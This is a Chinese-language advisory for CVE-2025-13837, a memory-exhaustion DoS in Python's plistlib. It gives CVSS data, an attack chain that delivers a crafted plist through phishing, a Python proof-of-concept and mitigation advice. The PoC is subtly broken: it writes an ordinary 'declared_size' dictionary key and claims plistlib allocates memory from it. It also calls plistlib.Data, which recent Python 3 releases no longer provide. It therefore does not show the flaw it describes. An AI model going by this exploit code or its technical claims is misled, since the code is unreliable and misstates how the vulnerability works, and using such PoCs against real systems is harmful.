CVE-2025-13837: Python plistlib模块拒绝服务漏洞

漏洞信息

漏洞编号

CVE-2025-13837

漏洞类型

拒绝服务/内存耗尽

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Python plistlib

漏洞概述

CVE-2025-13837是Python标准库中plistlib模块的一个拒绝服务漏洞。该漏洞由于plistlib模块在解析plist文件时，根据文件本身指定的字节大小来分配内存进行数据读取，存在严重的安全隐患。攻击者可以精心构造一个恶意的plist文件，通过在文件中声明一个巨大的数据大小值，诱导plistlib模块分配超出实际需要的内存资源，从而导致目标系统发生内存耗尽（OOM）情况，最终造成拒绝服务（DoS）攻击。此漏洞影响所有使用Python plistlib模块解析不可信来源plist文件的应用程序。由于攻击向量为本地（AV:L）且需要用户交互（UI:R），攻击复杂度相对较高，但仍需引起重视。CVSS评分5.5，属于中等严重程度，主要影响系统的可用性。

技术细节

Python的plistlib模块用于解析和生成Apple的plist格式文件。在解析过程中，模块会根据plist文件中嵌入的size字段来分配内存缓冲区以读取数据。攻击者可以通过构造一个恶意的plist文件，在size字段中指定一个极大的数值（例如数GB的大小），使得plistlib模块在解析时尝试分配巨大的内存空间。当系统无法满足如此大量的内存分配请求时，会触发MemoryError异常，导致应用程序崩溃或系统变得极不稳定。这种攻击方式利用了程序对输入数据信任的特性，属于典型的整数溢出/内存分配漏洞的变体。攻击成功的关键在于：1）目标系统使用存在漏洞的plistlib版本；2）攻击者能够诱使目标用户或系统加载恶意plist文件；3）系统可用内存不足以应对恶意分配请求。修复方案通常是在分配内存前对size值进行合理性校验，设置内存分配上限。

攻击链分析

STEP 1

步骤1

攻击者创建恶意plist文件，在文件中声明一个极大的size值（如数GB），远超实际数据大小

STEP 2

步骤2

攻击者通过社会工程学攻击（如钓鱼邮件、恶意网站下载）或中间人攻击等方式，将恶意plist文件传递给目标用户

STEP 3

步骤3

目标用户或系统上的应用程序使用存在漏洞的plistlib模块打开或解析该恶意plist文件

STEP 4

步骤4

plistlib模块根据文件中的size字段尝试分配相应大小的内存缓冲区，导致系统内存快速耗尽

STEP 5

步骤5

当内存分配失败时，触发MemoryError异常，导致应用程序崩溃或系统变得极不稳定，形成拒绝服务攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
CVE-2025-13837 PoC - Python plistlib OOM DoS
This PoC demonstrates the memory exhaustion vulnerability in Python's plistlib module.
"""

import plistlib
import struct
import os

def create_malicious_plist(output_path, fake_size=1024*1024*1024):
    """
    Create a malicious plist file that declares an extremely large size,
    causing plistlib to attempt allocating huge amounts of memory.
    
    Args:
        output_path: Path to save the malicious plist file
        fake_size: The fake size to declare in the plist (default: 1GB)
    """
    # Create a minimal plist with an oversized data field
    malicious_data = {
        'malicious_payload': plistlib.Data(b'\x00' * min(fake_size, 1024*1024)),  # Limit actual data
        'declared_size': fake_size  # This is what plistlib reads to allocate memory
    }
    
    with open(output_path, 'wb') as f:
        plistlib.dump(malicious_data, f)
    
    print(f'[+] Malicious plist created: {output_path}')
    print(f'[+] Declared size: {fake_size} bytes ({fake_size/(1024**3):.2f} GB)')

def trigger_vulnerability(plist_path):
    """
    Attempt to parse the malicious plist file to trigger OOM.
    """
    print(f'[*] Attempting to parse: {plist_path}')
    try:
        with open(plist_path, 'rb') as f:
            data = plistlib.load(f)
        print('[!] Parsed successfully - vulnerability may be patched')
    except MemoryError as e:
        print(f'[+] MemoryError triggered - vulnerability confirmed: {e}')
    except Exception as e:
        print(f'[-] Error: {type(e).__name__}: {e}')

if __name__ == '__main__':
    import sys
    
    # Create malicious plist with 1GB declared size
    fake_size = int(1024**3)  # 1GB
    output_file = 'malicious.plist'
    
    create_malicious_plist(output_file, fake_size)
    trigger_vulnerability(output_file)
    
    # Cleanup
    if os.path.exists(output_file):
        os.remove(output_file)

影响范围

Python plistlib < 受影响版本（具体版本需查看官方修复commit）

Python 3.x 系列多个版本存在此漏洞

使用plistlib模块解析不可信plist文件的所有Python应用

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1）避免使用Python plistlib模块解析来源不明的plist文件；2）对所有plist文件进行预先安全检查，拒绝size字段异常大的文件；3）限制Python进程的内存使用上限（如使用ulimit或cgroups）；4）使用应用程序级沙箱限制plistlib模块的内存分配行为；5）部署Web应用防火墙或入侵检测系统监控异常的文件解析行为；6）加强对用户上传文件的类型和内容验证。